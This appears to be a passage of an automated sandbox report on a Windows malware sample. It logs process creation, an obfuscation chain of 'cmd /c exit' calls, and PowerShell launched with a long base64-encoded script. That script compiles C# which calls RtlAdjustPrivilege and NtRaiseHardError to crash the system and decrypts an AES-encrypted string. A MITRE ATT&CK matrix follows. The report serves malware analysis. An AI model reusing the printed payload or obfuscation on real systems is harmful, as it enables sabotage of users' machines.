Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\.cmd""Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 97Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 98Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 99Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 100Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 101Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 102Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 103Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 104Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 105Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 106Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 107Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 108Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 109Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 110Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 111Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 112Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 113Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 114Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 115Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 116Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 117Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 118Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 119Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 120Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 121Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 122Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 65Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 66Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 67Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 68Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 69Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 70Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 71Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 72Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 109Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 110Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 111Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 112Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 113Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 114Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 79Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 80Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 81Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 82Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 119Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 100Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 101Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 86Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 104Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 88Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 68Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 69Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 70Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 71Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 50Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 51Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 52Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 53Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 113Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 116Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 117Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 57Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 123Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 98Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 63Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 58Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 46Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 104Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 88Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 68Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 69Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e JABzAD0AJwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ASQBPADsAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABYAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAaQBuAHQAIABwACwAYgBvAG8AbAAgAGUALABiAG8AbwBsACAAYwAsAG8AdQB0ACAAYgBvAG8AbAAgAG8AKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABOAHQAUgBhAGkAcwBlAEgAYQByAGQARQByAHIAbwByACgAdQBpAG4AdAAgAGUALAB1AGkAbgB0ACAAbgAsAHUAaQBuAHQAIAB1ACwASQBuAHQAUAB0AHIAIABwACwAdQBpAG4AdAAgAHYALABvAHUAdAAgAHUAaQBuAHQAIAByACkAOwBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAdQBuAHMAYQBmAGUAIABzAHQAcgBpAG4AZwAgAFMAaABvAHQAKAApAHsAYgBvAG8AbAAgAG8AOwB1AGkAbgB0ACAAcgA7AFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAMQA5ACwAdAByAHUAZQAsAGYAYQBsAHMAZQAsAG8AdQB0ACAAbwApADsATgB0AFIAYQBpAHMAZQBIAGEAcgBkAEUAcgByAG8AcgAoADAAeABjADAAMAAwADAAMAAyADIALAAwACwAMAAsAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsADYALABvAHUAdAAgAHIAKQA7AGIAeQB0AGUAWwBdAGMAPQBDAG8AbgB2AGUAcgB0AC4ARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAUgBOAG8AOABUAFoANQA2AFIAdgArAEUAeQBaAFcANwAzAE4AbwBjAEYATwBJAGkATgBGAGYATAA0ADUAdABYAHcAMgA0AFUAbwBnAEcAZABIAGsAcwB3AGUAYQAvAFcAaABuAE4AaABDAE4AdwBqAFEAbgAxAGEAVwBqAGYAdwAiACkAOwBiAHkAdABlAFsAXQBrAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAC8AYQAxAFkAKwBmAHMAcABxAC8ATgB3AGwAYwBQAHcAcABhAFQAMwBpAHIAWQAyAGgAYwBFAHkAdABrAHQAdQBIADcATABzAFkAKwBOAGwATABlAHcAPQAiACkAOwBiAHkAdABlAFsAXQBpAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiADkAcwBYAEcAbQBLADQAcQA5AEwAZABZAEYAZABPAHAANABUAFMAcwBRAHcAPQA9ACIAKQA7AHUAcwBpAG4AZwAoAEEAZQBzACAAYQA9AEEAZQBzAC4AQwByAGUAYQB0AGUAKAApACkAewBhAC4ASwBlAHkAPQBrADsAYQAuAEkAVgA9AGkAOwBJAEMAcgB5AHAAdABvAFQAcgBhAG4AcwBmAG8AcgBtACAAZAA9AGEALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoAGEALgBLAGUAeQAsAGEALgBJAFYAKQA7AHUAcwBpAG4AZwAoAHYAYQByACAAbQA9AG4AZQB3ACAATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKABjACkAKQB1AHMAaQBuAGcAKAB2AGEAcgAgAHkAPQBuAGUAdwAgAEMAcgB5AHAAdABvAFMAdAByAGUAYQBtACgAbQAsAGQALABDAHIAeQBwAHQAbwBTAHQAcgBlAGEAbQBNAG8AZABlAC4AUgBlAGEAZAApACkAdQBzAGkAbgBnACgAdgBhAHIAIABzAD0AbgBlAHcAIABTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAHkAKQApAHsAcgBlAHQAdQByAG4AIABzAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQB9AH0AfQAnADsAJABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AQwBvAGQAZQBEAG8AbQAuAEMAbwBtAHAAaQBsAGUAcgAuAEMAbwBtAHAAaQBsAGUAcgBQAGEAcgBhAG0AZQB0AGUAcgBzADsAJABjAC4AQwBvAG0AcABpAGwAZQByAE8AcAB0AGkAbwBuAHMAPQAnAC8AdQBuAHMAYQBmAGUAJwA7ACQAYQA9AEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABzACAALQBMAGEJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline"Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AF.tmp" "c:\Users\user\AppData\Local\Temp\pbkjdvqy\CSC3B4ECC64669B4C7AA39D189AE322B4F.TMP"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e jabzad0ajwb1ahmaaqbuagcaiabtahkacwb0aguabqa7ahuacwbpag4azwagafmaeqbzahqazqbtac4avablahgadaa7ahuacwbpag4azwagafmaeqbzahqazqbtac4auwblagmadqbyagkadab5ac4aqwbyahkacab0ag8azwbyageacaboahkaowb1ahmaaqbuagcaiabtahkacwb0aguabqauafiadqbuahqaaqbtagualgbjag4adablahiabwbwafmazqbyahyaaqbjaguacwa7ahuacwbpag4azwagafmaeqbzahqazqbtac4asqbpadsacab1agiababpagmaiabjagwayqbzahmaiabyahsawwbeagwababjag0acabvahiadaaoaciabgb0agqababsac4azabsagwaigapaf0acab1agiababpagmaiabzahqayqb0agkaywagaguaeab0aguacgbuacaadqbpag4adaagafiadabsaeeazabqahuacwb0afaacgbpahyaaqbsaguazwblacgaaqbuahqaiabwacwaygbvag8abaagagualabiag8abwbsacaaywasag8adqb0acaaygbvag8abaagag8akqa7afsarabsagwasqbtahaabwbyahqakaaiag4adabkagwabaauagqababsaciakqbdahaadqbiagwaaqbjacaacwb0ageadabpagmaiablahgadablahiabgagahuaaqbuahqaiaboahqaugbhagkacwblaegayqbyagqarqbyahiabwbyacgadqbpag4adaagagualab1agkabgb0acaabgasahuaaqbuahqaiab1acwasqbuahqauab0ahiaiabwacwadqbpag4adaagahyalabvahuadaagahuaaqbuahqaiabyackaowbwahuaygbsagkaywagahmadabhahqaaqbjacaadqbuahmayqbmaguaiabzahqacgbpag4azwagafmaaabvahqakaapahsaygbvag8abaagag8aowb1agkabgb0acaacga7afiadabsaeeazabqahuacwb0afaacgbpahyaaqbsaguazwblacgamqa5acwadabyahuazqasagyayqbsahmazqasag8adqb0acaabwapadsatgb0afiayqbpahmazqbiageacgbkaeuacgbyag8acgaoadaaeabjadaamaawadaamaayadialaawacwamaasaekabgb0afaadabyac4awgblahiabwasadyalabvahuadaagahiakqa7agiaeqb0aguawwbdagmapqbdag8abgb2aguacgb0ac4argbyag8abqbcageacwbladyanabtahqacgbpag4azwaoaciaugboag8aoabuafoanqa2afiadgaraeuaeqbaafcanwazae4abwbjaeyatwbjagkatgbgagyataa0aduadabyahcamga0afuabwbnaecazabiagsacwb3aguayqavafcaaabuae4aaabdae4adwbqafeabgaxageavwbqagyadwaiackaowbiahkadablafsaxqbrad0aqwbvag4adgblahiadaauaeyacgbvag0aqgbhahmazqa2adqauwb0ahiaaqbuagcakaaiac8ayqaxafkakwbmahmacabxac8atgb3agwaywbqahcacabhafqamwbpahiawqayaggaywbfahkadabrahqadqbiadcatabzafkakwboagwatablahcapqaiackaowbiahkadablafsaxqbpad0aqwbvag4adgblahiadaauaeyacgbvag0aqgbhahmazqa2adqauwb0ahiaaqbuagcakaaiadkacwbyaecabqbladqacqa5aewazabzaeyazabpahaanabuafmacwbrahcapqa9aciakqa7ahuacwbpag4azwaoaeeazqbzacaayqa9aeeazqbzac4aqwbyaguayqb0aguakaapackaewbhac4aswblahkapqbradsayqauaekavga9agkaowbjaemacgb5ahaadabvafqacgbhag4acwbmag8acgbtacaazaa9agealgbdahiazqbhahqazqbeaguaywbyahkacab0ag8acgaoagealgblaguaeqasagealgbjafyakqa7ahuacwbpag4azwaoahyayqbyacaabqa9ag4azqb3acaatqblag0abwbyahkauwb0ahiazqbhag0akabjackakqb1ahmaaqbuagcakab2ageacgagahkapqbuaguadwagaemacgb5ahaadabvafmadabyaguayqbtacgabqasagqalabdahiaeqbwahqabwbtahqacgblageabqbnag8azablac4augblageazaapackadqbzagkabgbnacgadgbhahiaiabzad0abgblahcaiabtahqacgblageabqbsaguayqbkaguacgaoahkakqapahsacgblahqadqbyag4aiabzac4augblageazabuag8arqbuagqakaapadsafqb9ah0afqanadsajabjad0atgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4aqwbvagqazqbeag8abqauaemabwbtahaaaqbsaguacgauaemabwbtahaaaqbsaguacgbqageacgbhag0azqb0aguacgbzadsajabjac4aqwbvag0acabpagwazqbyae8acab0agkabwbuahmapqanac8adqbuahmayqbmaguajwa7acqayqa9aeeazabkac0avab5ahaazqagac0avab5ahaazqbeaguazgbpag4aaqb0agkabwbuacaajabzacaalqbmage
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e jabzad0ajwb1ahmaaqbuagcaiabtahkacwb0aguabqa7ahuacwbpag4azwagafmaeqbzahqazqbtac4avablahgadaa7ahuacwbpag4azwagafmaeqbzahqazqbtac4auwblagmadqbyagkadab5ac4aqwbyahkacab0ag8azwbyageacaboahkaowb1ahmaaqbuagcaiabtahkacwb0aguabqauafiadqbuahqaaqbtagualgbjag4adablahiabwbwafmazqbyahyaaqbjaguacwa7ahuacwbpag4azwagafmaeqbzahqazqbtac4asqbpadsacab1agiababpagmaiabjagwayqbzahmaiabyahsawwbeagwababjag0acabvahiadaaoaciabgb0agqababsac4azabsagwaigapaf0acab1agiababpagmaiabzahqayqb0agkaywagaguaeab0aguacgbuacaadqbpag4adaagafiadabsaeeazabqahuacwb0afaacgbpahyaaqbsaguazwblacgaaqbuahqaiabwacwaygbvag8abaagagualabiag8abwbsacaaywasag8adqb0acaaygbvag8abaagag8akqa7afsarabsagwasqbtahaabwbyahqakaaiag4adabkagwabaauagqababsaciakqbdahaadqbiagwaaqbjacaacwb0ageadabpagmaiablahgadablahiabgagahuaaqbuahqaiaboahqaugbhagkacwblaegayqbyagqarqbyahiabwbyacgadqbpag4adaagagualab1agkabgb0acaabgasahuaaqbuahqaiab1acwasqbuahqauab0ahiaiabwacwadqbpag4adaagahyalabvahuadaagahuaaqbuahqaiabyackaowbwahuaygbsagkaywagahmadabhahqaaqbjacaadqbuahmayqbmaguaiabzahqacgbpag4azwagafmaaabvahqakaapahsaygbvag8abaagag8aowb1agkabgb0acaacga7afiadabsaeeazabqahuacwb0afaacgbpahyaaqbsaguazwblacgamqa5acwadabyahuazqasagyayqbsahmazqasag8adqb0acaabwapadsatgb0afiayqbpahmazqbiageacgbkaeuacgbyag8acgaoadaaeabjadaamaawadaamaayadialaawacwamaasaekabgb0afaadabyac4awgblahiabwasadyalabvahuadaagahiakqa7agiaeqb0aguawwbdagmapqbdag8abgb2aguacgb0ac4argbyag8abqbcageacwbladyanabtahqacgbpag4azwaoaciaugboag8aoabuafoanqa2afiadgaraeuaeqbaafcanwazae4abwbjaeyatwbjagkatgbgagyataa0aduadabyahcamga0afuabwbnaecazabiagsacwb3aguayqavafcaaabuae4aaabdae4adwbqafeabgaxageavwbqagyadwaiackaowbiahkadablafsaxqbrad0aqwbvag4adgblahiadaauaeyacgbvag0aqgbhahmazqa2adqauwb0ahiaaqbuagcakaaiac8ayqaxafkakwbmahmacabxac8atgb3agwaywbqahcacabhafqamwbpahiawqayaggaywbfahkadabrahqadqbiadcatabzafkakwboagwatablahcapqaiackaowbiahkadablafsaxqbpad0aqwbvag4adgblahiadaauaeyacgbvag0aqgbhahmazqa2adqauwb0ahiaaqbuagcakaaiadkacwbyaecabqbladqacqa5aewazabzaeyazabpahaanabuafmacwbrahcapqa9aciakqa7ahuacwbpag4azwaoaeeazqbzacaayqa9aeeazqbzac4aqwbyaguayqb0aguakaapackaewbhac4aswblahkapqbradsayqauaekavga9agkaowbjaemacgb5ahaadabvafqacgbhag4acwbmag8acgbtacaazaa9agealgbdahiazqbhahqazqbeaguaywbyahkacab0ag8acgaoagealgblaguaeqasagealgbjafyakqa7ahuacwbpag4azwaoahyayqbyacaabqa9ag4azqb3acaatqblag0abwbyahkauwb0ahiazqbhag0akabjackakqb1ahmaaqbuagcakab2ageacgagahkapqbuaguadwagaemacgb5ahaadabvafmadabyaguayqbtacgabqasagqalabdahiaeqbwahqabwbtahqacgblageabqbnag8azablac4augblageazaapackadqbzagkabgbnacgadgbhahiaiabzad0abgblahcaiabtahqacgblageabqbsaguayqbkaguacgaoahkakqapahsacgblahqadqbyag4aiabzac4augblageazabuag8arqbuagqakaapadsafqb9ah0afqanadsajabjad0atgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4aqwbvagqazqbeag8abqauaemabwbtahaaaqbsaguacgauaemabwbtahaaaqbsaguacgbqageacgbhag0azqb0aguacgbzadsajabjac4aqwbvag0acabpagwazqbyae8acab0agkabwbuahmapqanac8adqbuahmayqbmaguajwa7acqayqa9aeeazabkac0avab5ahaazqagac0avab5ahaazqbeaguazgbpag4aaqb0agkabwbuacaajabzacaalqbmageJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.dll VolumeInformationJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Spearphishing Link		2
Command and Scripting Interpreter		1
DLL Side-Loading		11
Process Injection		21
Virtualization/Sandbox Evasion		OS Credential Dumping11
Process Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		11
Process Injection		LSASS Memory21
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager1
Application Window Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
